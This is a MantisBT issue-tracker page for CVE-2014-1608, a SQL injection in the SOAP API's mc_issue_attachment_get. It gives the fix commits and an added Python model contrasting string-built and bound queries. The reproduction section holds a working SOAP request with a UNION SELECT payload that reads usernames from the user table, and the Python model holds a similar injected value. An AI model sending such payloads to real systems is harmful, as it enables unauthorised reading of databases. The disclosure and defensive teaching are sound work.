View Issue Details

ID: 0016879
Project: mantisbt
Category: security
View Status: public
Last Update: 2014-02-07 18:24
Reporter: dregad
Assigned To: dregad
Priority: immediate
Severity: major
Reproducibility: have not tried
Status: closed
Resolution: fixed
Product Version: 1.1.0a4
Target Version: 1.2.16
Fixed in Version: 1.2.16
Summary: 0016879: CVE-2014-1608: soap:Envelope SQL injection attack
Description

The SOAP API can be used for SQL injection attacks.

Pasting relevant extracts of the original e-mail report below


The XML sent to the SOAP web service is sometimes validated, sometimes not. This
is independent of the php.ini and seems to depend on the PHP binary.
The php binaries on the different systems (I used the thoughtpolice images)
differ in the libxml2 version. But I am not quite sure this is the reason.

It is definitely still an issue, but it's not 100% sure whether the
responsibility is 100% at mantisbt.org

The XML request cannot be issued without a user account. The request allows
reading the contents of the entire Mantis database no matter what the user's
access permissions are. Mantis is often used with many projects and has a
fine-grained permission structure.

Steps To Reproduce

If you would like to reproduce the issue, you could issue the following
request to a current Mantis system (1.2.15), maybe on a recent CentOS image
from thoughtpolice (http://sourceforge.net/projects/thoughtpolicevm/). This
example uses the administrator account, because it is enabled by default...

<?xml version="1.0" encoding="utf-8"?><soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><mc_issue_attachment_get
xmlns="http://futureware.biz/mantisconnect"><username>administrator</username><password>root</password><issue_attachment_id>'
UNION SELECT 927,3358,1337,313373,1,1,1,1,1,username,23,42 FROM
mantis_user_table WHERE mantis_user_table.id=1 ORDER BY
bug_id,'true</issue_attachment_id></mc_issue_attachment_get></soap:Body></soap:Envelope>

This request selects the username from mantis_user_table with id=1. The
output is base64-encoded.

Additional Information

This issue was initially discovered and reported by e-mail by Andrea Barisani from oCERT, on behalf of Martin Herfurt <martin.herfurt@nruns.com>, a security researcher at n.runs professionals GmbH (https://www.nruns.com), who discovered the issue during an audit at a customer's site on an up-to-date machine with the latest Mantis version (1.2.15).

Tags: No tags attached.

Relationships

related to 0016880 (closed, dregad): CVE-2014-1609: SQL injection vulnerabilities
related to 0016898 (closed, dregad): Dropping deprecated database API function db_query()

Activities

dregad (developer), 2014-01-24 10:28, note ~0039161

grangeway quickly identified the root cause and provided a fix for the issue [1]

[1] https://github.com/grangeway/mantisbt/commit/b930f0e44481439ca5bca6b438e55641d139f7e2

Related Changesets

MantisBT: master-1.2.x 00b4c170

2014-01-17 11:24

Paul Richards

Committer: dregad

Fix CVE-2014-1608: mc_issue_attachment_get SQL injection

Use of db_query() instead of db_query_bound() allowed SQL injection
attacks due to unsanitized use of parameters within the query when using
the SOAP API mc_issue_attachment_get.

This issue was reported by e-mail by Andrea Barisani from oCERT, on
behalf of Martin Herfurt <martin.herfurt@nruns.com>, a security
researcher at n.runs professionals GmbH, who discovered the issue
during an audit at a customer's site.

Fixes 0016879

Signed-off-by: Damien Regad <dregad@mantisbt.org>

Conflicts:
api/soap/mc_file_api.php
Affected Issues: 0016879
mod - api/soap/mc_file_api.php

MantisBT: master 3be86ce3

2014-01-17 11:24

Paul Richards

Committer: dregad

Fix CVE-2014-1608: mc_issue_attachment_get SQL injection

Use of db_query() instead of db_query_bound() allowed SQL injection
attacks due to unsanitized use of parameters within the query when using
the SOAP API mc_issue_attachment_get.

This issue was reported by e-mail by Andrea Barisani from oCERT, on
behalf of Martin Herfurt <martin.herfurt@nruns.com>, a security
researcher at n.runs professionals GmbH, who discovered the issue
during an audit at a customer's site.

Fixes 0016879

Signed-off-by: Damien Regad <dregad@mantisbt.org>
Affected Issues: 0016879
mod - api/soap/mc_file_api.php
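The commit messages above name the root cause (db_query() with the caller's issue_attachment_id pasted into the SQL text) and the fix (db_query_bound(), which passes it as a bound parameter). The reporter also notes that the SOAP stack's XML validation cannot be relied on, so the server should check the field's type itself. The following Python/sqlite3 model is an added example written for this page; it is not MantisBT's PHP code. Everything in it is constructed: the attachment_table name and schema, the INJECTED_ID value (shaped like the report's payload but using the generic quote-rebalancing tail rather than the ORDER BY trick), and the BENIGN_REQUEST envelope; only mantis_user_table, the element names and the two namespace URIs come from the report.

```python
import sqlite3
import xml.etree.ElementTree as ET

# Namespaces taken from the request quoted in the report.
NS = {
    "soap": "http://schemas.xmlsoap.org/soap/envelope/",
    "mc": "http://futureware.biz/mantisconnect",
}


def build_db():
    """Constructed in-memory schema: an invented attachment_table plus
    mantis_user_table, which the report names. Not MantisBT's real schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE mantis_user_table (id INTEGER PRIMARY KEY, username TEXT);
        CREATE TABLE attachment_table (id INTEGER PRIMARY KEY, bug_id INTEGER, filename TEXT);
        INSERT INTO mantis_user_table VALUES (1, 'administrator');
        INSERT INTO attachment_table VALUES (7, 3, 'report.txt');
    """)
    return conn


def attachment_get_interpolated(conn, attachment_id):
    """Pre-fix pattern: the caller-supplied id is spliced into the SQL text,
    which is what db_query() with a string-built query amounted to."""
    sql = ("SELECT id, bug_id, filename FROM attachment_table "
           "WHERE id='%s'" % attachment_id)
    return conn.execute(sql).fetchall()


def attachment_get_bound(conn, attachment_id):
    """Post-fix pattern: the id travels as a bound parameter, so the database
    never parses it as SQL (the role db_query_bound() plays in the fix)."""
    sql = "SELECT id, bug_id, filename FROM attachment_table WHERE id=?"
    return conn.execute(sql, (attachment_id,)).fetchall()


def extract_attachment_id(soap_body):
    """Pull issue_attachment_id out of an mc_issue_attachment_get envelope."""
    root = ET.fromstring(soap_body)
    node = root.find(
        "soap:Body/mc:mc_issue_attachment_get/mc:issue_attachment_id", NS)
    return None if node is None else (node.text or "")


def validate_attachment_id(raw):
    """Server-side type check, independent of whether the SOAP stack validated
    the XML: the id is an integer, so anything else is rejected before it
    reaches the query layer."""
    raw = (raw or "").strip()
    if not raw.isdigit():
        raise ValueError("issue_attachment_id must be a non-negative integer")
    return int(raw)


# Constructed input shaped like the report's payload: closes the quoted id,
# unions in a row from mantis_user_table, then re-balances the trailing quote.
INJECTED_ID = ("' UNION SELECT 1,1,username FROM mantis_user_table "
               "WHERE id=1 AND ''='")

# Constructed benign request with the same element layout as the report's.
BENIGN_REQUEST = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body><mc_issue_attachment_get xmlns="http://futureware.biz/mantisconnect">
<username>reader</username><password>secret</password>
<issue_attachment_id>7</issue_attachment_id>
</mc_issue_attachment_get></soap:Body></soap:Envelope>"""


def demo():
    """Returns (leaked, safe, good): the interpolated query hands back a row
    from the user table, the bound query returns nothing for the same input,
    and the validated path returns the real attachment row."""
    conn = build_db()
    leaked = attachment_get_interpolated(conn, INJECTED_ID)
    safe = attachment_get_bound(conn, INJECTED_ID)
    good = attachment_get_bound(
        conn, validate_attachment_id(extract_attachment_id(BENIGN_REQUEST)))
    return leaked, safe, good


if __name__ == "__main__":
    leaked, safe, good = demo()
    print("interpolated:", leaked)   # cross-table row: [(1, 1, 'administrator')]
    print("bound:", safe)            # []
    print("validated+bound:", good)  # [(7, 3, 'report.txt')]
```

The bound query alone closes the hole the CVE describes; the digit check in validate_attachment_id is defence in depth that also gives a clean failure to log when a request carries a non-numeric id, which is the kind of request a detection rule on the SOAP endpoint should flag.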